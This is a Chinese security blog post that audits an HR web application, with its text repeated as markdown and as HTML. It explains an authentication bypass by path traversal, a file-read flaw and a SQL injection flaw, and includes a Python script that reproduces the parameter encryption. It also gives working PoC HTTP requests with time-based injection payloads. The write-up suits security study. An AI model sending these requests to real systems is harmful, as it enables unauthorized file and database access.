|||
|
|
---------
|
|||
|
|
|
|||
|
|
在此,以最近爆出的DisplayFiles文件读取和showmediainfo注入为例开始审计。
|
|||
|
|
|
|||
|
|
### DisplayFiles文件读取
|
|||
|
|
|
|||
|
|
web.xml搜索DisplayFiles,定位到代码:
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|

|
|||
|
|
可见从前端接受参数filepath,赋值给var3变量,var3经过SafeCode.decode方法,PubFunc.decrypt方法后,得到明文,根据方法名就可以初步猜测是解码和解密操作。后续就很简单了,var3传入File类,赋值给var4,开始获取文件的字节流并输出到响应里面
|
|||
|
|
|
|||
|
|
### showmediainfo注入
|
|||
|
|
|
|||
|
|
web.xml搜索showmediainfo,定位到代码:
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|

|
|||
|
|
前端接受usernumber、i9999、kind三个参数,分别赋值给var3、var4、var5三个变量。而后续逻辑明显可以看到sql语句的拼接,也就是注入点。发现var3和var4可注入,而var5是作为if的判断值。var3参数也经过 PubFunc.decrypt的解密。因此这个接口的注入,var4是比较简单的,var3需要经过解密操作。
|
|||
|
|
|
|||
|
|
0x03 加解密破解
|
|||
|
|
----------
|
|||
|
|
|
|||
|
|
由上方的漏洞审计可知,两个漏洞参数都需要进行解密操作,意味着前端传入的参数值是一个密文。跟进解密方法查看代码。刚好看到加密方法也在上方。
|
|||
|
|
|
|||
|
|
```js
|
|||
|
|
public static String encrypt(String var0) {
|
|||
|
|
if (null \== var0) {
|
|||
|
|
return "";
|
|||
|
|
} else {
|
|||
|
|
String var1 = SafeCode.encrypt(var0);
|
|||
|
|
var1 = var1.replaceAll("%", "@2HJ5@");
|
|||
|
|
var1 = var1.replaceAll("\\\\+", "@2HJB@");
|
|||
|
|
var1 = var1.replaceAll(" ", "@2HJ0@");
|
|||
|
|
var1 = var1.replaceAll("\\\\/", "@2HJF@");
|
|||
|
|
var1 = var1.replaceAll("\\\\?", "@3HJF@");
|
|||
|
|
var1 = var1.replaceAll("#", "@2HJ3@");
|
|||
|
|
var1 = var1.replaceAll("&", "@2HJ6@");
|
|||
|
|
var1 = var1.replaceAll("=", "@3HJD@");
|
|||
|
|
var1 = var1.replaceAll("\\r\\n", "").replaceAll("\\n", "").replaceAll("\\r", "");
|
|||
|
|
var1 = var1.replaceAll("@", "PAATTP");
|
|||
|
|
return var1;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public static String decrypt(String var0) {
|
|||
|
|
if (null \== var0) {
|
|||
|
|
return "";
|
|||
|
|
} else {
|
|||
|
|
var0 = var0.replaceAll("PAATTP", "@");
|
|||
|
|
var0 = var0.replaceAll("@2HJ5@", "%");
|
|||
|
|
var0 = var0.replaceAll("@2HJB@", "\\\\+");
|
|||
|
|
var0 = var0.replaceAll("@2HJ0@", " ");
|
|||
|
|
var0 = var0.replaceAll("@2HJF@", "\\\\/");
|
|||
|
|
var0 = var0.replaceAll("@3HJF@", "\\\\?");
|
|||
|
|
var0 = var0.replaceAll("@2HJ3@", "#");
|
|||
|
|
var0 = var0.replaceAll("@2HJ6@", "&");
|
|||
|
|
var0 = var0.replaceAll("@3HJD@", "=");
|
|||
|
|
String var1 = SafeCode.decrypt(var0);
|
|||
|
|
return var1;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
先看加密方法,首先var0参数传入到SafeCode.encrypt方法进行加密,跟进此方法,可以看到使用的是des加解密函数,为对称加密算法,意味着只要有加密密钥,即可正向加密,也可逆向解密。而加密密钥即为下图马赛克的值(这属于厂商敏感信息,不明文展示了):
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
搞懂了加解密算法实际为des加解密,然后再回到PubFunc.encrypt方法,可知进行了des加密后,又要把密文的%,+,/等字符(具体看上方代码)进行一个替换,得到最终的密文。而同样的,查看PubFunc.decrypt方法代码,可得是加密的逆向操作,先对密文进行字符串替换,得到des的密文,再进行des解密。使用此逻辑写python加解密脚本,如下:
|
|||
|
|
|
|||
|
|
```js
|
|||
|
|
from Crypto.Cipher import DES
|
|||
|
|
from Crypto.Util.Padding import pad, unpad
|
|||
|
|
from base64 import b64encode, b64decode
|
|||
|
|
|
|||
|
|
def encrypt(key, data):
|
|||
|
|
key = key.encode('utf-8')
|
|||
|
|
data = data.encode('utf-8')
|
|||
|
|
iv = b'\x01\x02\x03\x04\x05\x06\x07\x08' # 初始化向量
|
|||
|
|
cipher = DES.new(key, DES.MODE_CBC, iv)
|
|||
|
|
ct_bytes = cipher.encrypt(pad(data, DES.block_size))
|
|||
|
|
var1=b64encode(ct_bytes).decode('utf-8')
|
|||
|
|
var1 = var1.replace("%", "@2HJ5@");
|
|||
|
|
var1 = var1.replace("+", "@2HJB@");
|
|||
|
|
var1 = var1.replace(" ", "@2HJ0@");
|
|||
|
|
var1 = var1.replace("/", "@2HJF@");
|
|||
|
|
var1 = var1.replace("?", "@3HJF@");
|
|||
|
|
var1 = var1.replace("#", "@2HJ3@");
|
|||
|
|
var1 = var1.replace("&", "@2HJ6@");
|
|||
|
|
var1 = var1.replace("=", "@3HJD@");
|
|||
|
|
var1 = var1.replace("\r\n", "").replace("\n", "").replace("\r", "");
|
|||
|
|
var1 = var1.replace("@", "PAATTP");
|
|||
|
|
return var1
|
|||
|
|
|
|||
|
|
def decrypt(key, encrypted_data):
|
|||
|
|
key = key.encode('utf-8')
|
|||
|
|
encrypted_data = encrypted_data.replace("PAATTP", "@");
|
|||
|
|
encrypted_data = encrypted_data.replace("@2HJ5@", "%");
|
|||
|
|
encrypted_data = encrypted_data.replace("@2HJB@", "+");
|
|||
|
|
encrypted_data = encrypted_data.replace("@2HJ0@", " ");
|
|||
|
|
encrypted_data = encrypted_data.replace("@2HJF@", "/");
|
|||
|
|
encrypted_data = encrypted_data.replace("@3HJF@", "?");
|
|||
|
|
encrypted_data = encrypted_data.replace("@2HJ3@", "#");
|
|||
|
|
encrypted_data = encrypted_data.replace("@2HJ6@", "&");
|
|||
|
|
encrypted_data = encrypted_data.replace("@3HJD@", "=");
|
|||
|
|
encrypted_data = b64decode(encrypted_data)
|
|||
|
|
iv = b'\x01\x02\x03\x04\x05\x06\x07\x08' # 初始化向量
|
|||
|
|
cipher = DES.new(key, DES.MODE_CBC, iv)
|
|||
|
|
pt_bytes = unpad(cipher.decrypt(encrypted_data), DES.block_size)
|
|||
|
|
return pt_bytes.decode('utf-8')
|
|||
|
|
|
|||
|
|
if __name__ == "__main__":
|
|||
|
|
key = "xxxxx"
|
|||
|
|
data = "1' if db_name(1)='master' waitfor delay '0:0:6'--+"
|
|||
|
|
|
|||
|
|
encrypted_data = encrypt(key, data)
|
|||
|
|
print("Encrypted:", encrypted_data)
|
|||
|
|
encrypted_data='0JALorlQogBNgRuaXkp7QCus5DXQ1K1RU60C2QunGQUgKkcXUh9HXukA75IwTpCaGcqFlluMQLvPAATTP2HJFPAATTPgvSl8mZXxPAATTP2HJFPAATTPe2LWnL7Rg2Ceg0zzONMioPAATTP3HJDPAATTP'
|
|||
|
|
decrypted_data = decrypt(key, encrypted_data)
|
|||
|
|
print("Decrypted:", decrypted_data)
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
运行示意图:
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
0x04 最终poc
|
|||
|
|
----------
|
|||
|
|
|
|||
|
|
### DisplayFiles文件读取
|
|||
|
|
|
|||
|
|
读取c:/windows/win.ini,先加密路径:
|
|||
|
|
|
|||
|
|

|
|||
|
|
发送poc:
|
|||
|
|
|
|||
|
|
```js
|
|||
|
|
POST /templates/attestation/../../servlet/DisplayFiles HTTP/1.1
|
|||
|
|
Host:
|
|||
|
|
User-Agent:Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
|
|||
|
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
|
Content-Length: 41
|
|||
|
|
|
|||
|
|
filepath=Iy4ZOyMhERdhPLlFrJHBaRdJo53c25S1
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
### showmediainfo注入
|
|||
|
|
|
|||
|
|
先是简单的i9999参数注入,不走if (var5.equalsIgnoreCase("0")),即令kind=1,为字符型注入。payload:' waitfor delay '0:0:6'--+
|
|||
|
|
poc:
|
|||
|
|
|
|||
|
|
```js
|
|||
|
|
POST /templates/attestation/../../workbench/duty/showmediainfo HTTP/1.1
|
|||
|
|
Host:
|
|||
|
|
User-Agent:Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
|
|||
|
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
|
Content-Length: 53
|
|||
|
|
|
|||
|
|
kind=1&usernumber=&i9999=12' waitfor delay '0:0:6'--+
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
然后是usernumber注入,需要进入if (var5.equalsIgnoreCase("0")),即令kind=0,还需要加密payload:
|
|||
|
|
|
|||
|
|

|
|||
|
|
poc:
|
|||
|
|
|
|||
|
|
```js
|
|||
|
|
POST /templates/attestation/../../workbench/duty/showmediainfo HTTP/1.1
|
|||
|
|
Host: 127.0.0.1:8080
|
|||
|
|
User-Agent:Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
|
|||
|
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
|
Content-Length: 84
|
|||
|
|
|
|||
|
|
kind=0&usernumber=i8hoHAILh4YkvJtIAayRbk4pSpIEAvWmx22WPMFig6wPAATTP3HJDPAATTP&i9999=
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
</textarea>
|
|||
|
|
<div id=layer-photos-demo>
|
|||
|
|
<div id=md_view><div class=markdown-body><h2 blockindex=0>0x00 前言</h2>
|
|||
|
|
<p blockindex=1>我只能说,某景漏洞多的一。。。。。。<br>
|
|||
|
|
今天,就捡两个公开过的漏洞进行下审计吧</p>
|
|||
|
|
<h2 blockindex=2>0x01 过滤器查找</h2>
|
|||
|
|
<p blockindex=3>有经验的师傅都知道,此系统很多接口是做了鉴权的,并不能未授权访问。但是,有的接口加白了,可以通过加白接口进行路径穿越绕过鉴权。<br>
|
|||
|
|
废话不多说,开始正题。一般过滤器都会在web.xml里找到对应的接口与类名,搜索单词filter,定位到HireKeywordFilter类</p>
|
|||
|
|
<p blockindex=4><img src="
|
|||
|
|
查看代码,<code>var3.doFilter(var1, var2);</code>这行代码是调用FilterChain对象的<code>doFilter</code>方法,将ServletRequest对象和ServletResponse对象传递给下一个过滤器或Servlet进行处理。在Servlet过滤器中,通过调用<code>FilterChain</code>的<code>doFilter</code>方法,可以将请求传递给过滤器链中的下一个过滤器,或者如果没有下一个过滤器了,则传递给Servlet进行处理。</p>
|
|||
|
|
<p blockindex=5><img src="
|
|||
|
|
<img src="
|
|||
|
|
在这个例子中,若var6也就是uri是以/w_selfservice/oauthservlet开头的,即执行<code>var3.doFilter(var1, var2);</code>。那么当我访问其他接口。则使用/w_selfservice/oauthservlet../../即可绕过鉴权</p>
|
|||
|
|
<h2 blockindex=6>0x02 漏洞审计</h2>
|
|||
|
|
<p blockindex=7>在此,以最近爆出的DisplayFiles文件读取和showmediainfo注入为例开始审计。</p>
|
|||
|
|
<h3 blockindex=8>DisplayFiles文件读取</h3>
|
|||
|
|
<p blockindex=9>web.xml搜索DisplayFiles,定位到代码:</p>
|
|||
|
|
<p blockindex=10><img src="
|
|||
|
|
<p blockindex=11><img src="
|
|||
|
|
可见从前端接受参数filepath,赋值给var3变量,var3经过SafeCode.decode方法,PubFunc.decrypt方法后,得到明文,根据方法名就可以初步猜测是解码和解密操作。后续就很简单了,var3传入File类,赋值给var4,开始获取文件的字节流并输出到响应里面</p>
|
|||
|
|
<h3 blockindex=12>showmediainfo注入</h3>
|
|||
|
|
<p blockindex=13>web.xml搜索showmediainfo,定位到代码:</p>
|
|||
|
|
<p blockindex=14><img src="
|
|||
|
|
<p blockindex=15><img src="
|
|||
|
|
<p blockindex=16><img src="
|
|||
|
|
前端接受usernumber、i9999、kind三个参数,分别赋值给var3、var4、var5三个变量。而后续逻辑明显可以看到sql语句的拼接,也就是注入点。发现var3和var4可注入,而var5是作为if的判断值。var3参数也经过 PubFunc.decrypt的解密。因此这个接口的注入,var4是比较简单的,var3需要经过解密操作。</p>
|
|||
|
|
<h2 blockindex=17>0x03 加解密破解</h2>
|
|||
|
|
<p blockindex=18>由上方的漏洞审计可知,两个漏洞参数都需要进行解密操作,意味着前端传入的参数值是一个密文。跟进解密方法查看代码。刚好看到加密方法也在上方。</p>
|
|||
|
|
<pre blockindex=19><code class="hljs language-js">public <span class=hljs-keyword>static</span> <span class=hljs-built_in>String</span> <span class=hljs-function><span class=hljs-title>encrypt</span>(<span class=hljs-params><span class=hljs-built_in>String</span> var0</span>)</span> {
|
|||
|
|
<span class=hljs-keyword>if</span> (<span class=hljs-literal>null</span> \== var0) {
|
|||
|
|
<span class=hljs-keyword>return</span> <span class=hljs-string>""</span>;
|
|||
|
|
} <span class=hljs-keyword>else</span> {
|
|||
|
|
<span class=hljs-built_in>String</span> var1 = SafeCode.encrypt(var0);
|
|||
|
|
var1 = var1.replaceAll(<span class=hljs-string>"%"</span>, <span class=hljs-string>"@2HJ5@"</span>);
|
|||
|
|
var1 = var1.replaceAll(<span class=hljs-string>"\\\\+"</span>, <span class=hljs-string>"@2HJB@"</span>);
|
|||
|
|
var1 = var1.replaceAll(<span class=hljs-string>" "</span>, <span class=hljs-string>"@2HJ0@"</span>);
|
|||
|
|
var1 = var1.replaceAll(<span class=hljs-string>"\\\\/"</span>, <span class=hljs-string>"@2HJF@"</span>);
|
|||
|
|
var1 = var1.replaceAll(<span class=hljs-string>"\\\\?"</span>, <span class=hljs-string>"@3HJF@"</span>);
|
|||
|
|
var1 = var1.replaceAll(<span class=hljs-string>"#"</span>, <span class=hljs-string>"@2HJ3@"</span>);
|
|||
|
|
var1 = var1.replaceAll(<span class=hljs-string>"&"</span>, <span class=hljs-string>"@2HJ6@"</span>);
|
|||
|
|
var1 = var1.replaceAll(<span class=hljs-string>"="</span>, <span class=hljs-string>"@3HJD@"</span>);
|
|||
|
|
var1 = var1.replaceAll(<span class=hljs-string>"\\r\\n"</span>, <span class=hljs-string>""</span>).replaceAll(<span class=hljs-string>"\\n"</span>, <span class=hljs-string>""</span>).replaceAll(<span class=hljs-string>"\\r"</span>, <span class=hljs-string>""</span>);
|
|||
|
|
var1 = var1.replaceAll(<span class=hljs-string>"@"</span>, <span class=hljs-string>"PAATTP"</span>);
|
|||
|
|
<span class=hljs-keyword>return</span> var1;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public <span class=hljs-keyword>static</span> <span class=hljs-built_in>String</span> <span class=hljs-function><span class=hljs-title>decrypt</span>(<span class=hljs-params><span class=hljs-built_in>String</span> var0</span>)</span> {
|
|||
|
|
<span class=hljs-keyword>if</span> (<span class=hljs-literal>null</span> \== var0) {
|
|||
|
|
<span class=hljs-keyword>return</span> <span class=hljs-string>""</span>;
|
|||
|
|
} <span class=hljs-keyword>else</span> {
|
|||
|
|
var0 = var0.replaceAll(<span class=hljs-string>"PAATTP"</span>, <span class=hljs-string>"@"</span>);
|
|||
|
|
var0 = var0.replaceAll(<span class=hljs-string>"@2HJ5@"</span>, <span class=hljs-string>"%"</span>);
|
|||
|
|
var0 = var0.replaceAll(<span class=hljs-string>"@2HJB@"</span>, <span class=hljs-string>"\\\\+"</span>);
|
|||
|
|
var0 = var0.replaceAll(<span class=hljs-string>"@2HJ0@"</span>, <span class=hljs-string>" "</span>);
|
|||
|
|
var0 = var0.replaceAll(<span class=hljs-string>"@2HJF@"</span>, <span class=hljs-string>"\\\\/"</span>);
|
|||
|
|
var0 = var0.replaceAll(<span class=hljs-string>"@3HJF@"</span>, <span class=hljs-string>"\\\\?"</span>);
|
|||
|
|
var0 = var0.replaceAll(<span class=hljs-string>"@2HJ3@"</span>, <span class=hljs-string>"#"</span>);
|
|||
|
|
var0 = var0.replaceAll(<span class=hljs-string>"@2HJ6@"</span>, <span class=hljs-string>"&"</span>);
|
|||
|
|
var0 = var0.replaceAll(<span class=hljs-string>"@3HJD@"</span>, <span class=hljs-string>"="</span>);
|
|||
|
|
<span class=hljs-built_in>String</span> var1 = SafeCode.decrypt(var0);
|
|||
|
|
<span class=hljs-keyword>return</span> var1;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=20>先看加密方法,首先var0参数传入到SafeCode.encrypt方法进行加密,跟进此方法,可以看到使用的是des加解密函数,为对称加密算法,意味着只要有加密密钥,即可正向加密,也可逆向解密。而加密密钥即为下图马赛克的值(这属于厂商敏感信息,不明文展示了):</p>
|
|||
|
|
<p blockindex=21><img src="
|
|||
|
|
<p blockindex=22>搞懂了加解密算法实际为des加解密,然后再回到PubFunc.encrypt方法,可知进行了des加密后,又要把密文的%,+,/等字符(具体看上方代码)进行一个替换,得到最终的密文。而同样的,查看PubFunc.decrypt方法代码,可得是加密的逆向操作,先对密文进行字符串替换,得到des的密文,再进行des解密。使用此逻辑写python加解密脚本,如下:</p>
|
|||
|
|
<pre blockindex=23><code class="hljs language-js"><span class=hljs-keyword>from</span> Crypto.Cipher <span class=hljs-keyword>import</span> DES
|
|||
|
|
<span class=hljs-keyword>from</span> Crypto.Util.Padding <span class=hljs-keyword>import</span> pad, unpad
|
|||
|
|
<span class=hljs-keyword>from</span> base64 <span class=hljs-keyword>import</span> b64encode, b64decode
|
|||
|
|
|
|||
|
|
def encrypt(key, data):
|
|||
|
|
key = key.encode(<span class=hljs-string>'utf-8'</span>)
|
|||
|
|
data = data.encode(<span class=hljs-string>'utf-8'</span>)
|
|||
|
|
iv = b<span class=hljs-string>'\x01\x02\x03\x04\x05\x06\x07\x08'</span> # 初始化向量
|
|||
|
|
cipher = DES.new(key, DES.MODE_CBC, iv)
|
|||
|
|
ct_bytes = cipher.encrypt(pad(data, DES.block_size))
|
|||
|
|
var1=b64encode(ct_bytes).decode(<span class=hljs-string>'utf-8'</span>)
|
|||
|
|
var1 = var1.replace(<span class=hljs-string>"%"</span>, <span class=hljs-string>"@2HJ5@"</span>);
|
|||
|
|
var1 = var1.replace(<span class=hljs-string>"+"</span>, <span class=hljs-string>"@2HJB@"</span>);
|
|||
|
|
var1 = var1.replace(<span class=hljs-string>" "</span>, <span class=hljs-string>"@2HJ0@"</span>);
|
|||
|
|
var1 = var1.replace(<span class=hljs-string>"/"</span>, <span class=hljs-string>"@2HJF@"</span>);
|
|||
|
|
var1 = var1.replace(<span class=hljs-string>"?"</span>, <span class=hljs-string>"@3HJF@"</span>);
|
|||
|
|
var1 = var1.replace(<span class=hljs-string>"#"</span>, <span class=hljs-string>"@2HJ3@"</span>);
|
|||
|
|
var1 = var1.replace(<span class=hljs-string>"&"</span>, <span class=hljs-string>"@2HJ6@"</span>);
|
|||
|
|
var1 = var1.replace(<span class=hljs-string>"="</span>, <span class=hljs-string>"@3HJD@"</span>);
|
|||
|
|
var1 = var1.replace(<span class=hljs-string>"\r\n"</span>, <span class=hljs-string>""</span>).replace(<span class=hljs-string>"\n"</span>, <span class=hljs-string>""</span>).replace(<span class=hljs-string>"\r"</span>, <span class=hljs-string>""</span>);
|
|||
|
|
var1 = var1.replace(<span class=hljs-string>"@"</span>, <span class=hljs-string>"PAATTP"</span>);
|
|||
|
|
<span class=hljs-keyword>return</span> var1
|
|||
|
|
|
|||
|
|
def decrypt(key, encrypted_data):
|
|||
|
|
key = key.encode(<span class=hljs-string>'utf-8'</span>)
|
|||
|
|
encrypted_data = encrypted_data.replace(<span class=hljs-string>"PAATTP"</span>, <span class=hljs-string>"@"</span>);
|
|||
|
|
encrypted_data = encrypted_data.replace(<span class=hljs-string>"@2HJ5@"</span>, <span class=hljs-string>"%"</span>);
|
|||
|
|
encrypted_data = encrypted_data.replace(<span class=hljs-string>"@2HJB@"</span>, <span class=hljs-string>"+"</span>);
|
|||
|
|
encrypted_data = encrypted_data.replace(<span class=hljs-string>"@2HJ0@"</span>, <span class=hljs-string>" "</span>);
|
|||
|
|
encrypted_data = encrypted_data.replace(<span class=hljs-string>"@2HJF@"</span>, <span class=hljs-string>"/"</span>);
|
|||
|
|
encrypted_data = encrypted_data.replace(<span class=hljs-string>"@3HJF@"</span>, <span class=hljs-string>"?"</span>);
|
|||
|
|
encrypted_data = encrypted_data.replace(<span class=hljs-string>"@2HJ3@"</span>, <span class=hljs-string>"#"</span>);
|
|||
|
|
encrypted_data = encrypted_data.replace(<span class=hljs-string>"@2HJ6@"</span>, <span class=hljs-string>"&"</span>);
|
|||
|
|
encrypted_data = encrypted_data.replace(<span class=hljs-string>"@3HJD@"</span>, <span class=hljs-string>"="</span>);
|
|||
|
|
encrypted_data = b64decode(encrypted_data)
|
|||
|
|
iv = b<span class=hljs-string>'\x01\x02\x03\x04\x05\x06\x07\x08'</span> # 初始化向量
|
|||
|
|
cipher = DES.new(key, DES.MODE_CBC, iv)
|
|||
|
|
pt_bytes = unpad(cipher.decrypt(encrypted_data), DES.block_size)
|
|||
|
|
<span class=hljs-keyword>return</span> pt_bytes.decode(<span class=hljs-string>'utf-8'</span>)
|
|||
|
|
|
|||
|
|
<span class=hljs-keyword>if</span> __name__ == <span class=hljs-string>"__main__"</span>:
|
|||
|
|
key = <span class=hljs-string>"xxxxx"</span>
|
|||
|
|
data = <span class=hljs-string>"1' if db_name(1)='master' waitfor delay '0:0:6'--+"</span>
|
|||
|
|
|
|||
|
|
encrypted_data = encrypt(key, data)
|
|||
|
|
print(<span class=hljs-string>"Encrypted:"</span>, encrypted_data)
|
|||
|
|
encrypted_data=<span class=hljs-string>'0JALorlQogBNgRuaXkp7QCus5DXQ1K1RU60C2QunGQUgKkcXUh9HXukA75IwTpCaGcqFlluMQLvPAATTP2HJFPAATTPgvSl8mZXxPAATTP2HJFPAATTPe2LWnL7Rg2Ceg0zzONMioPAATTP3HJDPAATTP'</span>
|
|||
|
|
decrypted_data = decrypt(key, encrypted_data)
|
|||
|
|
print(<span class=hljs-string>"Decrypted:"</span>, decrypted_data)
|
|||
|
|
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=24>运行示意图:</p>
|
|||
|
|
<p blockindex=25><img src=
|
|||
|
|
<h2 blockindex=26>0x04 最终poc</h2>
|
|||
|
|
<h3 blockindex=27>DisplayFiles文件读取</h3>
|
|||
|
|
<p blockindex=28>读取c:/windows/win.ini,先加密路径:</p>
|
|||
|
|
<p blockindex=29><img src="
|
|||
|
|
发送poc:</p>
|
|||
|
|
<pre blockindex=30><code class="hljs language-js">POST /templates/attestation/../../servlet/DisplayFiles HTTP/<span class=hljs-number>1.1</span>
|
|||
|
|
<span class=hljs-attr>Host</span>:
|
|||
|
|
User-Agent:Mozilla/<span class=hljs-number>5.0</span> (X11; OpenBSD i386) AppleWebKit/<span class=hljs-number>537.36</span> (KHTML, like Gecko) Chrome/<span class=hljs-number>36.0</span><span class=hljs-number>.1985</span><span class=hljs-number>.125</span> Safari/<span class=hljs-number>537.36</span>
|
|||
|
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
|
Content-Length: <span class=hljs-number>41</span>
|
|||
|
|
|
|||
|
|
filepath=Iy4ZOyMhERdhPLlFrJHBaRdJo53c25S1
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=31><img src=
|
|||
|
|
<h3 blockindex=32>showmediainfo注入</h3>
|
|||
|
|
<p blockindex=33>先是简单的i9999参数注入,不走if (var5.equalsIgnoreCase("0")),即令kind=1,为字符型注入。payload:' waitfor delay '0:0:6'--+<br>
|
|||
|
|
poc:</p>
|
|||
|
|
<pre blockindex=34><code class="hljs language-js">POST /templates/attestation/../../workbench/duty/showmediainfo HTTP/<span class=hljs-number>1.1</span>
|
|||
|
|
<span class=hljs-attr>Host</span>:
|
|||
|
|
User-Agent:Mozilla/<span class=hljs-number>5.0</span> (X11; OpenBSD i386) AppleWebKit/<span class=hljs-number>537.36</span> (KHTML, like Gecko) Chrome/<span class=hljs-number>36.0</span><span class=hljs-number>.1985</span><span class=hljs-number>.125</span> Safari/<span class=hljs-number>537.36</span>
|
|||
|
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
|
Content-Length: <span class=hljs-number>53</span>
|
|||
|
|
|
|||
|
|
kind=<span class=hljs-number>1</span>&usernumber=&i9999=<span class=hljs-number>12</span><span class=hljs-string>' waitfor delay '</span><span class=hljs-number>0</span>:<span class=hljs-number>0</span>:<span class=hljs-number>6</span><span class=hljs-string>'--+
|
|||
|
|
</span></code></pre>
|
|||
|
|
<p blockindex=35><img src=
|
|||
|
|
然后是usernumber注入,需要进入if (var5.equalsIgnoreCase("0")),即令kind=0,还需要加密payload:</p>
|
|||
|
|
<p blockindex=36><img src=
|
|||
|
|
poc:</p>
|
|||
|
|
<pre blockindex=37><code class="hljs language-js">POST /templates/attestation/../../workbench/duty/showmediainfo HTTP/<span class=hljs-number>1.1</span>
|
|||
|
|
<span class=hljs-attr>Host</span>: <span class=hljs-number>127.0</span><span class=hljs-number>.0</span><span class=hljs-number>.1</span>:<span class=hljs-number>8080</span>
|
|||
|
|
User-Agent:Mozilla/<span class=hljs-number>5.0</span> (X11; OpenBSD i386) AppleWebKit/<span class=hljs-number>537.36</span> (KHTML, like Gecko) Chrome/<span class=hljs-number>36.0</span><span class=hljs-number>.1985</span><span class=hljs-number>.125</span> Safari/<span class=hljs-number>537.36</span>
|
|||
|
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
|
Content-Length: <span class=hljs-number>84</span>
|
|||
|
|
|
|||
|
|
kind=<span class=hljs-number>0</span>&usernumber=i8hoHAILh4YkvJtIAayRbk4pSpIEAvWmx22WPMFig6wPAATTP3HJDPAATTP&i9999=
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=38><img src="
|
|||
|
|
</div>
|
|||
|
|
<div class="post-opt mt-30">
|
|||
|
|
<ul class="list-inline text-muted">
|
|||
|
|
<li>
|
|||
|
|
<i class="fa fa-clock-o"></i>
|
|||
|
|
发表于 2024-04-30 09:00:02
|
|||
|
|
</li>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</ul>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|